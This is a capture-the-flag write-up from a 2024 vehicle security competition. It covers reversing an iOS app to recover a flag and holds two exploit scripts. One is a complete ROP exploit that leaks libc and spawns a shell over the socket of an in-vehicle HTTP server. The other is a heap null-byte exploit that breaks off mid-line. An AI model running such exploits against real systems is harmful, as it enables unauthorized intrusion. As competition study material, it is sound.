01 VehicleAPP
![[WriteUP · Part 2] 2024 WIDC World Intelligent Driving Challenge "Topsec Cup" Information Security Attack-Defense Competition](https://ctfiot.oss-cn-beijing.aliyuncs.com/uploads/2024/06/0-1717846649.png)
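(2) Obtain the IPA
(3) Reverse engineer it
(4) The app enforces PIN code authentication
(5) Follow cross-references to find the verification function
(6) Obtain the global variable
(7) Call it to obtain the flag
(8) Analyze it segment by segment and verify the length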
02 IVIServer
The IVI starts an HTTP server.
```python
from pwn import *

context.log_level = 'debug'
context.binary = ELF('./server')
elf = ELF('./server')
libc = ELF('./libc-2.31.so')
SOCKFD = 4


def get(payload):
    # Open a new connection and send one GET request carrying the ROP chain
    global p
    p = remote('127.0.0.1', 9080)
    py = flat({
        0: b'GET /',
        255: b'\r',
        # The ROP chain goes at offset 0x138 of the request
        0x138: [
            payload
        ],
    }, filler=b'\x00')
    p.send(py + b'\r\n')


# Stage 1: call the binary's http_response on the GOT entry of write to leak libc
rop = ROP(elf)
rop.http_response(4, elf.got['write'])
get(rop.chain())
p.recvuntil(b'</html>\nHTTP/1.1')
libcbase = u64(p.recvline().strip().ljust(8, b'\x00')) - libc.symbols['write']
success(hex(libcbase))
libc.address = libcbase

# Stage 2: redirect stdin/stdout/stderr to the socket, then call system("/bin/sh")
rop = ROP(libc)
rop.dup2(SOCKFD, 0)
rop.dup2(SOCKFD, 1)
rop.dup2(SOCKFD, 2)
rop.system(next(libc.search(b'/bin/sh')))
get(rop.chain())
p.recvuntil(b'</html>\n')
p.interactive()
```
03 BabyMain
An accident caused by a single pebble
```python
from ptrlib import *
from tqdm import tqdm

libc = ELF("./libc-2.31.so")
sock = Socket("172.10.0.20", 9003)

# 1. Leak heap address
# Prepare libc address on heap
for i in range(4):
    sock.sendlineafter("> ", "1")
    sock.sendlineafter("index: ", str(i))

# Overwrite saved rbp of main function frame
sock.sendlineafter("> ", "1")
sock.sendlineafter("index: ", "6")

# Poison null byte to argv[0] and return address of main
sock.sendlineafter("> ", "2")
sock.sendlineafter("index: ", b"9" + b"
```